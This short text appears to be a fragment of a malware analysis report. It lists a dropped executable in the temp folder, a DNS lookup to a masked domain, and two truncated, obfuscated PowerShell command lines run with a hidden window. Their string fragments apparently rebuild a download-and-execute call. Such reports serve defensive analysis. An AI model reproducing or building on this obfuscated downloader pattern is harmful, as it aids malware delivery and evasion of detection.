Technical Information
- %TEMP%\cfupithy.exe
- DNS ASK co####tsites.com
- '<SYSTEM32>\cmd.exe' /c "powershell $kirumz='^com';$xboqti='^''\c';$qepgu='^-Ex';$ujmuzx='^-Ob';$umkuso='^$pa';$duha='^t).';$ykhad='^://';$cdadkikg='^.We';$yxymz='^nlo';$arafh='^adF';$ynganci='^ss ';$repgo='^ St';...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell $kirumz='^com';$xboqti='^''\c';$qepgu='^-Ex';$ujmuzx='^-Ob';$umkuso='^$pa';$duha='^t).';$ykhad='^://';$cdadkikg='^.We';$yxymz='^nlo';$arafh='^adF';$ynganci='^ss ';$repgo='^ St';...